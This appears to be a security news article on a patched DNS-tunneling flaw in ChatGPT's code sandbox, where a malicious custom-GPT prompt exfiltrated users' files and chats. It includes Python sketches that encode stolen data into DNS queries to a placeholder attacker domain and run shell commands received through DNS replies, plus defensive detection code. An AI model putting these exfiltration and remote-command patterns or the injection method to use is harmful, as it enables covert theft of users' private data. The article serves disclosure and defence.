Mar 31, 2026 · 6 min read
A Hidden Channel in ChatGPT Let Attackers Steal Your Conversations Without a Trace
Check Point researchers found a DNS tunneling flaw in ChatGPT's code execution environment that could silently exfiltrate uploaded files, medical data, and private messages to remote servers.
The Vulnerability
Security researchers at Check Point Research discovered that ChatGPT's code execution environment, the sandboxed container where the AI runs Python code and analyzes uploaded files, had a hidden outbound communication path to the public internet. While OpenAI designed the container to block direct network requests, it left DNS resolution completely uncontrolled.
That gap was enough. By encoding sensitive data into DNS subdomain labels, an attacker could smuggle information out of the sandbox through normal recursive DNS lookups, bypassing every other network restriction OpenAI had put in place.
How the Attack Worked
The technique is called DNS tunneling. Instead of sending data over a blocked HTTP connection, the attacker encodes stolen information into what looks like a routine domain name lookup. For example, a query for stolen-data-fragment.attacker-domain.com looks like normal DNS traffic but carries exfiltrated content in the subdomain portion.
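To make the encoding step concrete, here is a minimal sketch of how an exfiltration payload can be packed into DNS query names. The function name and the attacker-domain.com placeholder are illustrative, not taken from the actual exploit; the real constraints are the DNS limits of 63 bytes per label and roughly 253 bytes per full name.

```python
import base64

MAX_LABEL = 63  # DNS caps each label (dot-separated segment) at 63 bytes

def encode_exfil_queries(data: bytes, attacker_domain: str) -> list:
    """Split data into DNS-safe chunks and build one query name per chunk."""
    # Base32 survives the case folding resolvers may apply and uses
    # only characters that are legal in hostnames
    encoded = base64.b32encode(data).decode().rstrip("=").lower()
    chunks = [encoded[i:i + MAX_LABEL] for i in range(0, len(encoded), MAX_LABEL)]
    # A sequence-number label lets the attacker's server reassemble in order
    return [f"{seq}.{chunk}.{attacker_domain}" for seq, chunk in enumerate(chunks)]
```

Resolving each of these names through the sandbox's ordinary recursive resolver delivers the payload: the attacker simply reads the labels back out of the query log on their authoritative nameserver, with no direct connection to the sandbox ever established.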
A single malicious prompt was all it took to activate the channel. Once triggered, every subsequent user message became a potential data source. The attacker could target raw conversation text, content extracted from uploaded files, and even the AI's own generated summaries and assessments.
Worse, the channel was bidirectional. Attackers could send instructions through DNS responses and receive results back, effectively establishing remote shell access inside the Linux environment that ChatGPT uses for code execution.
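One round of such a bidirectional channel can be sketched as follows. This is a hypothetical illustration, not Check Point's actual payload: fetch_txt is a placeholder for a real TXT-record lookup against the attacker's nameserver, and cmd.attacker-domain.com is an invented rendezvous name.

```python
import base64
import subprocess

def fetch_txt(name: str) -> str:
    # Placeholder: a real implant would issue a DNS TXT lookup here and
    # read the attacker's encoded response out of the answer record.
    raise NotImplementedError

def c2_step(fetch=fetch_txt) -> bytes:
    """One round of the bidirectional channel: a command travels down
    inside a TXT response, runs in the sandbox, and its output comes
    back for exfiltration via outbound queries."""
    cmd = base64.b64decode(fetch("cmd.attacker-domain.com")).decode()
    result = subprocess.run(cmd, shell=True, capture_output=True)
    return result.stdout  # would be chunked into DNS query labels on the way out
```

Looping this step is what turns a one-shot leak into the effective remote shell the researchers describe: commands flow in through DNS answers, results flow out through DNS questions.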
The Medical Data Demonstration
Check Point built a proof of concept using a third-party GPT configured as a "personal doctor." A user uploaded a PDF containing laboratory test results with personal identifiers, then described their symptoms and asked for analysis. The GPT processed everything normally and provided medical advice.
Behind the scenes, the patient's name, medical data, and the AI's health assessment were silently transmitted to an attacker-controlled server. When the user explicitly asked ChatGPT whether it had sent their data externally, it answered confidently that it had not, explaining that the file was "only stored in a secure internal location."
The AI was not lying in the traditional sense. It simply could not detect that DNS queries constituted an external data transfer, because it was never designed to treat DNS as a communication channel.
What Could Have Been Stolen
Any data processed through ChatGPT's code execution environment was at risk:
- Private conversation messages
- Uploaded documents including contracts, financial statements, and medical records
- AI-generated summaries and analysis of sensitive material
- Personal identifiers extracted from files
For organizations using ChatGPT to process regulated data, the implications extend to GDPR, HIPAA, and financial compliance violations. A backdoored custom GPT could have silently harvested data from every user who interacted with it.
OpenAI's Response
OpenAI patched the vulnerability on February 20, 2026, closing the DNS tunneling path in the code execution runtime. The company stated it had already identified the underlying issue internally. Check Point publicly disclosed the flaw on March 30, 2026, after confirming the fix was in place. There is no evidence the vulnerability was exploited maliciously before patching.
What This Means for AI Users
This vulnerability is a reminder that AI tools process data in environments with their own attack surfaces. Even when a platform appears sandboxed, infrastructure-level gaps like uncontrolled DNS can create exfiltration paths that neither the AI nor the user can detect.
Practical steps to reduce risk:
- Avoid uploading documents containing personal identifiers, medical data, or financial details to AI chatbots
- Be cautious with third-party GPTs and custom AI applications from unknown developers
- If your organization uses AI for sensitive data processing, ensure your deployment includes network monitoring that covers DNS traffic
- Review ChatGPT's privacy settings and disable features you do not need
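The DNS-monitoring recommendation above is concrete enough to sketch. Tunneled payloads tend to produce query names with unusually long, high-entropy labels, which a monitoring pipeline can flag. The thresholds below are made up for illustration, not tuned values; real deployments calibrate them against their own traffic baselines.

```python
import math
from collections import Counter

def label_entropy(label: str) -> float:
    """Shannon entropy, in bits per character, of one DNS label."""
    counts = Counter(label)
    total = len(label)
    return -sum(c / total * math.log2(c / total) for c in counts.values())

def looks_like_tunneling(qname: str, max_label_len: int = 40,
                         max_entropy: float = 3.8) -> bool:
    """Flag query names whose subdomain labels look like encoded payloads."""
    # Skip the registered domain and TLD; only subdomain labels carry payload
    labels = qname.rstrip(".").split(".")[:-2]
    return any(
        len(lbl) > max_label_len
        or (len(lbl) > 10 and label_entropy(lbl) > max_entropy)
        for lbl in labels
    )
```

A heuristic like this catches the noisy bulk-exfiltration case; a patient attacker can trade bandwidth for stealth with short, low-rate queries, which is why DNS monitoring complements rather than replaces blocking unneeded resolution outright.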
The broader pattern is consistent across the tech industry: companies build powerful tools, secure the obvious attack vectors, and leave less visible channels unprotected. Whether it is email tracking pixels smuggling data through image loads or AI chatbots leaking data through DNS queries, the principle is the same. If a channel exists, someone will eventually use it to move data where it should not go.